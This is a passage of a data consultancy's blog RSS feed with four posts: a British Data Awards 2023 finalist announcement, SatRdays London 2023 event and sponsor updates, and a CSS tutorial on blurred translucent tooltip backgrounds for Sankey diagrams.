&lt;/p&gt;</description></item><item><title>We’re a British Data Awards 2023 Finalist</title><link>https://www.jumpingrivers.com/blog/britsh-data-awards-finalists/</link><pubDate>Tue, 11 Apr 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/britsh-data-awards-finalists/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/britsh-data-awards-finalists/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/britsh-data-awards-finalists/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;We’re delighted to announce that we’ve been named a Finalist in the British Data Awards
2023.&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://predatech.co.uk/british-data-awards/" rel="external"&gt;British Data Awards&lt;/a&gt; is an annual quest to discover and celebrate data success stories.
Organisations taking part this year range from FTSE 100 heavyweights, public sector
pioneers, technology unicorns, fast-growing scale-ups, essential Not-For-Profits, and
everything in between.&lt;/p&gt;
&lt;p&gt;A record 226 entries were received this year which means that competition to be named a
Finalist proved to be particularly tough, so we’re especially pleased to be announced as a
Finalist.&lt;/p&gt;
&lt;p&gt;Jason Johnson, Co-Founder of &lt;a href="https://predatech.co.uk/" rel="external"&gt;Predatech&lt;/a&gt; and British Data Awards judge said: “Judging the
British Data Awards this year wasn’t easy given the high standard of entries. All our Finalists
should be incredibly proud of their data success stories and for helping to showcase the best
that the world of data has to offer. I look forward to celebrating your achievements in May.”&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-british-data-awards-finalists"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;!-- This is where the ad goes! Just use the name of the shortcode file. --&gt;&lt;/p&gt;
&lt;h3 id="our-nominations"&gt;Our nominations&lt;/h3&gt;
&lt;h4 id="data-for-good-consulting-initiative-of-the-year-sponsored-by-the-dot-collective"&gt;Data for Good Consulting Initiative of the Year (sponsored by The Dot Collective)&lt;/h4&gt;
&lt;p&gt;Jumping Rivers has been working on a project for the World Health Organisation Europe, streamlining and maintaining their &lt;a href="https://worldhealthorg.shinyapps.io/EURO_COVID-19_vaccine_monitor/" rel="external"&gt;COVID19 vaccination programme monitoring application&lt;/a&gt;. You may have read a little about this project in our recent blogs on &lt;a href="https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-continuous-integration/" rel="external"&gt;offloading Shiny&amp;rsquo;s workload&lt;/a&gt; and &lt;a href="https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-github-actions/" rel="external"&gt;working smarter, not harder&lt;/a&gt; with automated workflows. This is a great example of data being utilised to track and develop global initiatives. The maintenance that Jumping Rivers has performed on this app allows it to be quick, flexible and robust to changes in the data. The automation also allows the staff at the WHO/Europe to concentrate their efforts on important initiatives, rather than spending their time cleaning and managing data.&lt;/p&gt;
&lt;img src="who-project.png" alt="A screenshot of a map of Europe from the WHO/Europe COVID19 vaccination programme monitoring app." style="width: 100%" /&gt;
&lt;h4 id="rising-star-of-the-year"&gt;Rising Star of the Year&lt;/h4&gt;
&lt;p&gt;&lt;a href="https://www.linkedin.com/in/jwalton93/" rel="external"&gt;Jack Walton&lt;/a&gt; is a finalist for the Rising Star of the Year award! Jack is very community driven, leading data science meetups and contributing to open source projects and online support networks. He inhabits a unique space in the industry, between data science and data engineering, carving out a position for himself acting as an intermediary between the two areas, and allowing for greater collaboration across the company.&lt;/p&gt;
&lt;p style="text-align:center;"&gt;&lt;img src="jack-walton.jpg" alt="A photo of Jack Walton smiling in front of a wall." style="width: 40%" align="center" /&gt;&lt;/p&gt;
&lt;h3 id="quote-from-a-company-spokesperson"&gt;Quote from a company spokesperson&lt;/h3&gt;
&lt;p&gt;The British Data Awards 2023 will announce Winners across some 22 categories. A number
of Highly Commended awards will also be presented. This year, ‘Data for Good Initiative of
the Year’ and ‘Innovation of the Year’ received the most entries categories.
Other categories include ‘Data Leader of the Year’ and ‘Technology Company of the Year’,
while new categories including ‘Climate Change Initiative of the Year’ were introduced to
help showcase and celebrate the work of a diverse group of organisations.
The British Data Awards 2023 judging panel included:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Roshan Awatar: Group Director, Data &amp;amp; Analytics at Sky&lt;/li&gt;
&lt;li&gt;Lynne Bailey: Chief Data Officer at KPMG UK&lt;/li&gt;
&lt;li&gt;Neil Carden: CEO at Forth Point I A Blend360 Company&lt;/li&gt;
&lt;li&gt;Dr Sophie Carr: Founder at Bays Consulting&lt;/li&gt;
&lt;li&gt;Caroline Carruthers: CEO at Carruthers and Jackson&lt;/li&gt;
&lt;li&gt;Christina Finlay: Director of Data &amp;amp; Analytics, Nest&lt;/li&gt;
&lt;li&gt;Roxane Heaton: Chief Information Officer at Macmillan Cancer Support&lt;/li&gt;
&lt;li&gt;Natalie Jakomis: Director of Data &amp;amp; Analytics at Rightmove&lt;/li&gt;
&lt;li&gt;Jason Johnson: Co-Founder at Predatech&lt;/li&gt;
&lt;li&gt;Natasha Lauer: Head of Marketing at Soda&lt;/li&gt;
&lt;li&gt;Dr Jo Watts: CEO &amp;amp; Founder at effini&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Finalists will be celebrated, and Winners announced, at an awards ceremony taking place in
London on the 11 th May.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/britsh-data-awards-finalists/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>SatRdays London is now Hybrid!</title><link>https://www.jumpingrivers.com/blog/virtual-satrdays-london/</link><pubDate>Thu, 06 Apr 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/virtual-satrdays-london/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/virtual-satrdays-london/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/virtual-satrdays-london/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;SatRdays London is fast approaching, and we have a couple of exciting announcements to share with you!&lt;/p&gt;
&lt;h3 id="full-program-available-now"&gt;Full program available now&lt;/h3&gt;
&lt;p&gt;The full list of speakers and their abstracts can now be found in a downloadable program on our &lt;a href="https://satrday-london-2023.jumpingrivers.com/" rel="external"&gt;conference website&lt;/a&gt;, along with the schedule for the day and the registration options.&lt;/p&gt;
&lt;h3 id="registration-deadline-extension"&gt;Registration deadline extension&lt;/h3&gt;
&lt;p&gt;The registration deadline has now been extended to the &lt;strong&gt;21st April&lt;/strong&gt;, so you can &lt;a href="https://satrday-london-2023.jumpingrivers.com/#registration" rel="external"&gt;register&lt;/a&gt; all the way up to the day before the event!&lt;/p&gt;
&lt;h3 id="virtual-tickets-now-available"&gt;Virtual tickets now available&lt;/h3&gt;
&lt;p&gt;Most excitingly, we are pleased to announce that this will now be a hybrid event! If you aren&amp;rsquo;t able to make it to London for the day, there&amp;rsquo;s no need to miss out. You can sign up in the same place (via the &lt;a href="https://satrday-london-2023.jumpingrivers.com/" rel="external"&gt;website&lt;/a&gt;), and select the &amp;ldquo;Virtual only&amp;rdquo; option! You will then be able to watch live on the day, and join in on the Q&amp;amp;A sessions with our speakers.&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;re really looking forward to hosting you all, whether at the incredible &lt;a href="https://en.wikipedia.org/wiki/Bush_House" rel="external"&gt;Bush House&lt;/a&gt; in London or virtually, so please book your place now to make sure you don&amp;rsquo;t miss out on our excellent line up of speakers. We have a great range of talk topics, from R in journalism and MLOps, to sustainability and EDI in the R project, air quality analysis to scrutinising government spending, and much more, there will be something for everyone at this month&amp;rsquo;s SatRdays London event!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/virtual-satrdays-london/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Optimising tooltip design with modern CSS</title><link>https://www.jumpingrivers.com/blog/optimising-tooltip-design-modern-css/</link><pubDate>Thu, 30 Mar 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/optimising-tooltip-design-modern-css/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/optimising-tooltip-design-modern-css/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/optimising-tooltip-design-modern-css/assets/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;link rel="stylesheet" href="assets/interactive.css"&gt;
&lt;script src="assets/interactive.js" defer&gt;&lt;/script&gt;
&lt;p&gt;In my blog post on &lt;a href="https://www.jumpingrivers.com/blog/improving-responsiveness-shiny-applications/"&gt;improving the responsiveness of Shiny applications&lt;/a&gt; I mentioned a recent project I was involved with as part of a collaboration with &lt;a href="https://utahtech.edu/" rel="external"&gt;Utah Tech University&lt;/a&gt;. Part of that project involved the construction of interactive &lt;a href="https://en.wikipedia.org/wiki/Sankey_diagram" rel="external"&gt;Sankey&lt;/a&gt; (or to be extra-precise &lt;a href="https://en.wikipedia.org/wiki/Alluvial_diagram" rel="external"&gt;&amp;ldquo;alluvial&amp;rdquo;&lt;/a&gt;) diagrams using the &lt;a href="https://d3js.org/" rel="external"&gt;d3 JavaScript library&lt;/a&gt;. One of the requirements was that the user could hover over a link or node in the diagram and see all the connections to or from that link or node highlighted. The image below shows a cropped section of one such Sankey, constructed using data from the diamonds dataset in R&amp;rsquo;s {ggplot2} package. The data used was handy for illustrative purposes here - whether a Sankey diagram is a good way of visualising that data is largely moot for the discussion that follows.&lt;/p&gt;
&lt;figure aria-label="A close-up of part of a Sankey diagram"&gt;
&lt;img src="assets/background.jpg" srcset="assets/background@2x.jpg 2x" aria-hidden="true" /&gt;
&lt;/figure&gt;
&lt;p&gt;While colour-highlighting can be a great way of emphasizing part or parts of a chart or diagram, it doesn&amp;rsquo;t usually add precise information, which was important to the client. To add this precise information we used a tooltip. But to make them as effective as possible we had to spend a bit of time refining their design.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-optimising-tooltip-design-modern-css"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="the-power-of-tooltips"&gt;The power of tooltips&lt;/h2&gt;
&lt;p&gt;Tooltips typically give you precise information next to your cursor or where you&amp;rsquo;ve just tapped. That is to say, where you happen to be looking. This is great because, to put it bluntly, your peripheral vision is rubbish. Don&amp;rsquo;t worry, mine is too. As Jeff Johnson outlines in &lt;a href="https://www.elsevier.com/books/designing-with-the-mind-in-mind/johnson/978-0-12-818202-4" rel="external"&gt;Designing with the Mind in Mind&lt;/a&gt;) (third edition, chapter 5), the centre of our visual field - the fovea - contains around 158,000 cone cells per square millimetre and around half of the visual cortex is then devoted to processing information coming from the fovea. Yet the fovea makes up only about 1% of the retina! The rest of the retina contains &lt;em&gt;only&lt;/em&gt; around 9,000 cones per square millimetre and, on top of that, data from these cells is compressed (multiple cones and rods connect to each ganglion cell) before being sent to the brain.&lt;/p&gt;
&lt;p&gt;Peripheral vision is useful for detecting &lt;em&gt;motion&lt;/em&gt;. That&amp;rsquo;s great if you want to see that apex predator sneaking up on you or that application in your MacOS Dock that really wants you to give it some attention (thanks Apple! 🙄). So peripheral vision guides attention. By using tooltips close to your cursor you don&amp;rsquo;t have to worry about your user&amp;rsquo;s focus and attention having to dart from one bit of the screen to another (and maybe getting lost on the outward or return journey).&lt;/p&gt;
&lt;p&gt;Returning to our Sankey diagram, by adding a tooltip relating to the item being hovered over we can see precise information relating to that item - &lt;a href="https://www.cs.umd.edu/~ben/papers/Shneiderman1996eyes.pdf" rel="external"&gt;&amp;ldquo;details on demand&amp;rdquo;&lt;/a&gt;.&lt;/p&gt;
&lt;figure id="opaque-tooltip" aria-label="A large, opaque, tooltip occludes the data beneath it"&gt;
&lt;img src="assets/background.jpg" srcset="assets/background@2x.jpg 2x" aria-hidden="true" /&gt;
&lt;img class="tooltip" src="assets/tooltip.png" srcset="assets/tooltip@2x.png 2x" aria-hidden="true" /&gt;
&lt;/figure&gt;
&lt;h2 id="the-problem-with-tooltips"&gt;The problem with tooltips&lt;/h2&gt;
&lt;p&gt;There&amp;rsquo;s a problem. And that problem is the same as the advantage given before: the tooltip is placed right where you happen to be looking. This is bad because there&amp;rsquo;s a reasonable chance some useful information has just been occluded. If we compare the two images above we can see that, in the latter case, the &amp;ldquo;Good&amp;rdquo; node has been completely hidden while the vertical extents of the &amp;ldquo;Very Good&amp;rdquo; and &amp;ldquo;Fair&amp;rdquo; nodes are also no longer obvious. With a tooltip that follows the cursor, the user can move around a bit, but it&amp;rsquo;s not ideal, especially with the thinner links.&lt;/p&gt;
&lt;p&gt;One obvious option is to make the background translucent. With an HTML tooltip we can do that by setting its CSS &lt;code&gt;background-color&lt;/code&gt; property to a colour with an alpha channel value less than one. Let&amp;rsquo;s try &lt;code&gt;rgba(255, 255, 255, 0.3)&lt;/code&gt;:&lt;/p&gt;
&lt;figure id="translucent-tooltip" aria-label="A large, translucent tooltip does not occlude the data beneath it but text of the tooltip that overlaps text from the background is difficult to read"&gt;
&lt;img src="assets/background.jpg" srcset="assets/background@2x.jpg 2x" aria-hidden="true" /&gt;
&lt;img class="tooltip" src="assets/tooltip.png" srcset="assets/tooltip@2x.png 2x" aria-hidden="true" /&gt;
&lt;/figure&gt;
&lt;p&gt;This does a pretty good job of fixing the occlusion problem but now the text on the diagram interferes with the text of the tooltip, making them both hard to read where they overlap. One could conceivably hide the Sankey text when the tooltip is visible, but that is likely to lead to an annoying flashing behaviour as that text comes and goes with cursor movement.&lt;/p&gt;
&lt;h2 id="combatting-occlusion-without-introducing-intereference"&gt;Combatting occlusion without introducing intereference&lt;/h2&gt;
&lt;p&gt;Now, chances are you&amp;rsquo;ve sat through a few video conferences over the last few years. If you have, there&amp;rsquo;s a high chance you&amp;rsquo;ve seen the use of blurring background filters - the application detects what, in the video feed, is the human and what is the background and blurs the latter. The viewer of the feed then sees the human clearly while the background is much less clear. There&amp;rsquo;s still a general feeling for what&amp;rsquo;s there but not the details. You might be able to make out that there&amp;rsquo;s a bookshelf with books and trinkets but not the titles of the books or the precise nature of the trinkets.&lt;/p&gt;
&lt;p&gt;This got me wondering whether I could do something similar for tooltips. I already knew there was a CSS &lt;code&gt;filter&lt;/code&gt; property with a &lt;code&gt;blur()&lt;/code&gt; function so I thought I&amp;rsquo;d try that:&lt;/p&gt;
&lt;figure id="all-blur-tooltip" aria-label="The whole tooltip is blurred, making it unreadable"&gt;
&lt;img src="assets/background.jpg" srcset="assets/background@2x.jpg 2x" aria-hidden="true" /&gt;
&lt;img class="tooltip" src="assets/tooltip.png" srcset="assets/tooltip@2x.png 2x" aria-hidden="true" /&gt;
&lt;/figure&gt;
&lt;p&gt;Oops. That did not improve readability at all. Obviously I don&amp;rsquo;t want to blur the text in the tooltip. So my next thought was to make the text container transparent then place a separate, translucent, background element directly behind it and apply the blur filter to that. Thankfully I didn&amp;rsquo;t have to go to that faff as I discovered there also exists a &lt;code&gt;backdrop-filter&lt;/code&gt; property. The interactive graphic below shows it in action, with the updating CSS below showing what might be used with a tooltip that has an HTML class of &lt;code&gt;&amp;quot;tooltip&amp;quot;&lt;/code&gt;. (Note that in this example the blur is measured in pixels and the image size varies with screen width, so the optimal blur size here may vary for you depending on the dimensions of your browser window.)&lt;/p&gt;
&lt;div id="interactive-container"&gt;
&lt;figure aria-label="Interactive graphic where the controls can be used to change the opacity and blur size of the tooltip background"&gt;
&lt;img src="assets/background.jpg" srcset="assets/background@2x.jpg 2x" aria-hidden="true" /&gt;
&lt;img class="tooltip" src="assets/tooltip.png" srcset="assets/tooltip@2x.png 2x" aria-hidden="true" /&gt;
&lt;/figure&gt;
&lt;div id="controls"&gt;
&lt;label&gt;Opacity: &lt;input id="opacity-control" type="number" min="0" max="1" step="0.1" value="0.3"/&gt;&lt;/label&gt;
&lt;label&gt;Blur: &lt;input id="blur-control" type="number" min="0" max="20" value="2"/&gt;px&lt;/label&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-CSS" data-lang="CSS"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .&lt;span style="color:#f0883e;font-weight:bold"&gt;tooltip&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;background-color&lt;/span&gt;: rgba(&lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0.3&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; backdrop-filter: blur(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This does exactly what I want: The text of the tooltip is completely readable (for me at least, more on that in the Q &amp;amp; A section below). The &amp;ldquo;Good&amp;rdquo; node is still visible as a distinct entity from the &amp;ldquo;Fair&amp;rdquo; and &amp;ldquo;Very Good&amp;rdquo; nodes. Ok, I can&amp;rsquo;t read the label any more, but I at least know there is something of interest there.&lt;/p&gt;
&lt;p&gt;What is actually happening? The CSS &lt;code&gt;blur&lt;/code&gt; function applies a Gaussian blur to the target element&amp;rsquo;s background with the standard deviation specified as the argument (e.g. two pixels). Large areas of flat colour are only really affected at the edges - in entirely non-scientific terms I like to think of it as some of the colour from one pixel being smudged into neighbouring and nearby pixels while the nearby pixels smudge the same colour back into the original pixel for no net effect. Text is basically all edges and so is completely smudged - black text on a white background becoming a grey &amp;ldquo;blob&amp;rdquo;.&lt;/p&gt;
&lt;p&gt;A more scientific explanation would probably include talk of &lt;a href="https://mathworld.wolfram.com/FourierTransform.html" rel="external"&gt;Fourier transforms&lt;/a&gt;, the &lt;a href="https://en.wikipedia.org/wiki/Frequency_domain" rel="external"&gt;frequency domain&lt;/a&gt; and &lt;a href="https://en.wikipedia.org/wiki/Low-pass_filter" rel="external"&gt;low-pass filters&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="q-and-a"&gt;Q and A&lt;/h2&gt;
&lt;h3 id="does-this-work-on-all-browsers"&gt;Does this work on all browsers?&lt;/h3&gt;
&lt;p&gt;The &lt;code&gt;backdrop-filter&lt;/code&gt; property &lt;a href="https://caniuse.com/css-backdrop-filter" rel="external"&gt;does not work on Safari&lt;/a&gt; at the time of writing, it&amp;rsquo;s simply ignored. However, there is a vendor-prefixed version - &lt;code&gt;-webkit-backdrop-filter&lt;/code&gt; - that does work. So a little update to the CSS code (that I already sneaked in behind the scenes to the example above) can make this work across all modern browsers (as far as I&amp;rsquo;m aware):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-CSS" data-lang="CSS"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;.&lt;span style="color:#f0883e;font-weight:bold"&gt;tooltip&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;background-color&lt;/span&gt;: rgba(&lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0.3&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;-webkit-&lt;/span&gt;backdrop-filter: blur(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; backdrop-filter: blur(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="what-about-accessibility"&gt;What about accessibility?&lt;/h3&gt;
&lt;p&gt;While we like to &lt;a href="https://www.jumpingrivers.com/tags/accessibility/"&gt;cover accessibility issues in our blog posts&lt;/a&gt;, a thorough treatment of tooltip accessibility is beyond the scope of this post. However, it &lt;em&gt;is&lt;/em&gt; worth mentioning that some people may struggle with the reduced contrast that can come with a translucent tooltip background. So it might be worth considering offering users an override to make the background opaque. Alternatively, your CSS code can check if your user has informed their operating system or browser that they prefer increased contrast. When they do, you then override the applied styles:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-CSS" data-lang="CSS"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;.&lt;span style="color:#f0883e;font-weight:bold"&gt;tooltip&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;background-color&lt;/span&gt;: rgba(&lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0.3&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;-webkit-&lt;/span&gt;backdrop-filter: blur(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; backdrop-filter: blur(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;@&lt;span style="color:#ff7b72"&gt;media&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;(&lt;/span&gt;&lt;span style="color:#7ee787"&gt;prefers-contrast&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#7ee787"&gt;more&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;)&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .&lt;span style="color:#f0883e;font-weight:bold"&gt;tooltip&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;background-color&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;white&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;-webkit-&lt;/span&gt;backdrop-filter: &lt;span style="color:#79c0ff"&gt;none&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; backdrop-filter: &lt;span style="color:#79c0ff"&gt;none&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="will-this-solve-all-my-tooltip-occlusion-issues"&gt;Will this solve all my tooltip occlusion issues?&lt;/h3&gt;
&lt;p&gt;Probably not. It works here because the encodings I want to keep visible are large blocks of colour and those I want &amp;ldquo;obscured&amp;rdquo; are smaller. Because of this, I&amp;rsquo;m guessing this design style might work effectively with some thematic maps. On the other hand, where the data is encoded using small elements (e.g. a scatter plot with lots of small points of varying colour) the result might not be ideal.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/optimising-tooltip-design-modern-css/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>SatRdays London 2023: Sponsors</title><link>https://www.jumpingrivers.com/blog/satrdays-london-sponsors/</link><pubDate>Tue, 28 Mar 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/satrdays-london-sponsors/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-sponsors/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/satrdays-london-sponsors/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;a href="https://satrday-london-2023.jumpingrivers.com/" rel="external"&gt;SatRdays London 2023 is fast approaching!&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="dont-miss-out-ticket-sales-close-at-midnight-on-8th-april"&gt;Don&amp;rsquo;t miss out! Ticket sales close at midnight on 8th April!&lt;/h3&gt;
&lt;p&gt;On 22nd April 2023 we will be hosting SatRdays London, an inclusive, low cost event, which gives R users an opportunity to network and learn from other experts across sectors. In a &lt;a href="https://www.jumpingrivers.com/blog/satrdays-london-speakers/" rel="external"&gt;recent blog post&lt;/a&gt;, we introduced all of the speakers for the event! This week, it&amp;rsquo;s the sponsors turn.&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-satrdays-sponsors"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;!-- This is where the ad goes! Just use the name of the shortcode file. --&gt;&lt;/p&gt;
&lt;h3 id="cusp-london"&gt;CUSP London&lt;/h3&gt;
&lt;p&gt;The &lt;a href="https://cusplondon.ac.uk/" rel="external"&gt;Centre for Urban Science and Progress (CUSP)&lt;/a&gt; are based in London, UK. Their mission is to support interdisciplinary research and innovation using Data Science in and for London, bringing together multi-disciplinary teams of academics, a group of associates from external partners and students working with CUSP.&lt;/p&gt;
&lt;p&gt;CUSP London, hosted in the King’s Department of Informatics, is part of an international network of multidisciplinary institutes led by CUSP New York at the NYU Tandon School of Engineering. They welcome new academic collaborators and external partners into the CUSP family locally and internationally.&lt;/p&gt;
&lt;p&gt;CUSP are generously providing the venue for SatRdays London 2023.&lt;/p&gt;
&lt;h3 id="jumping-rivers"&gt;Jumping Rivers&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt; is an analytics company based in the North East who specialise in creating bespoke solutions for modern business problems. Their team is made up of experts in data science and data engineering from many different backgrounds, and their wealth of knowledge and experience allows them to think outside the box and solve problems in new and innovative ways.&lt;/p&gt;
&lt;h3 id="posit"&gt;Posit&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt; (formerly RStudio), are a US based company who develop R and Python-based tools to help you produce higher quality analysis faster. As well as creating open-source tools for all to use and develop, Posit are very active in the data science community, hosting &lt;a href="https://posit.co/conference/" rel="external"&gt;their own annual conference&lt;/a&gt;, as well as supporting conferences around the world, including SatRdays London!&lt;/p&gt;
&lt;h3 id="r-consortium"&gt;R Consortium&lt;/h3&gt;
&lt;p&gt;The central mission of the &lt;a href="https://www.r-consortium.org/" rel="external"&gt;R Consortium&lt;/a&gt; is to work with and provide support to the R Foundation and to the key organisations developing, maintaining, distributing and using R software through the identification, development and implementation of infrastructure projects. Its members include leading institutions and companies dedicated to the use, development and growth of R.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-sponsors/"&gt;original post&lt;/a&gt;
